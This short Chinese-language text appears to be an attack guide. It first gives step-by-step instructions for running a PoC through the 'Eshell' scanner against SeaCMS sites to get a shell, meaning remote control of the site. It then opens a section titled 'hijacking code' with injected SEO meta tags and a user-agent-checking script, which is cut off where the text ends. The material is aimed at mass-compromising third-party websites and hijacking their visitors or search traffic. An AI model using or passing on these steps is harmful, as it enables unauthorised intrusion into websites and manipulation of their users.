一.将poc放置在admin_poc文件夹 二.打开Eshell-网站扫描，导入要扫描的seacms域名（先用cms识别功能获得seacms域名），选中poc模式开启（必须），选中你要测试的漏洞（这里勾选seacms漏洞），点击开始扫描。 三.结果验证 显示漏洞存在，即为getshell。

一.劫持代码 <title>标题</title> <meta name="keywords" content="关键词,关键词1,关键词2,关键词3"/> <meta name="description" content="描述"/> <script>if(!navigator.userAgent.toLocaleLo…